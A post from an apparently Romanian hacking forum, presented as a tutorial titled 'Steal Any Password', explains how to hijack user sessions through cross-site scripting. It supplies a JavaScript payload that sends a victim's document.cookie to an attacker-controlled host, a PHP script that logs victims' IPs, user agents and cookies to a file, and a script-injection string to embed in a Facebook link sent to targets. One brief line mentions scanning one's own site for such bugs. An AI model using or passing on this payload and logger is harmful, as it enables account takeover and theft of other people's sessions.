Steal Any Password

www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum

Lista Forumurilor Pe Tematici

www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat.

Nou pe simpatie:
Lolalola

Femeie
23 ani
Cluj
cauta Barbat
26 - 80 ani

www.Hacking-Romania.com / Tutoriale Hack EN / Steal Any Password

Autor

Mesaj

Pagini: 1

948Y-H4(K3R
☻ADM!N☻

Inregistrat: acum 17 ani
Postari: 2716

Background: XSS is done by people putting codes into a website which runs on the webpage when a user does a specific event. Typically, people attempt to steal cookies in this manner, and this is all I’m going to show, but other things can be stolen, and some other codes could be ran through a javascript file.

Steps:

1. Create your javascript file, xss.js. An example is below. This file connects to your grabcookie.php file and includes the users cookie in the URL.
2. You obviously need your grabcookie.php file. Your grabcookie.php file is what saves the cookie. You can view the code below. This uses the GET function to retrieve to cookie from the URL. It then adds the cookie and other items together and formats them, and then adds them to a current log file, cookiejar.php. You need to create a blank file called cookiejar.php and upload it to the same directory as your other files.
3. Now how are the cookies accessed? Simple. Connect to your webpage at “http://www.site.com/cookies/cookiejar.php”. Here is where all the cookies are saved to.
4. Now you just need to find a exploit in the site to request to their .js (javascript) file, which then runs its code. A list of some exploits can be found on this site, ” ha.ckers.org web application security lab. Of course, there are many others too, but that would be a start for you. A great web page scanner for you to check out is Acunetix Web Vulnerability Scanner 4. It scans the webpage for many exploits and bugs. Scan your site and then secure the bugs to prevent any xss attacks on your site.

Files:
xss.js

Code:

var i=new Image();
i.src = " http://www.site.com/cookies/grabcookie.php?cookie="+document.cookie

grabcookie.php

Code:

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['cookie'];

$time = date("d-m-Y G : i : s A");

$text = $time." = ".$ip."<br>User Agent:".$agent."<br>Referer:  ".$referer."<br>Session:   ".$data."<br><br><br>";

$handle=fopen("cookiejar.php","a");
fputs($handle,"\n".$text."\n");
$handle = $handle + "\n";
fclose($handle);

?>

Applying it:
The document.cookie function only retrieves cookies from the CURRENT webpage. if you were to type in javascript:document.cookie to your current 7S window.. it would display your username (in # form) and password (in encoded form). If a person got their hands on this they could add your cookies and basically go on your account without knowing your password.

For security reasons (your safety not mine) I am going to show you how xss can be used. The following link manipulates facebook into adding some content of my own. SkillzBase | Facebook
Now if you were to replace that chunk of my code with lets say "><script src="PATH/TO/YOUR/XSS"></script> and sent that link to a person, then you can take their login infookie

pus acum 16 ani

Pagini: 1

Mergi la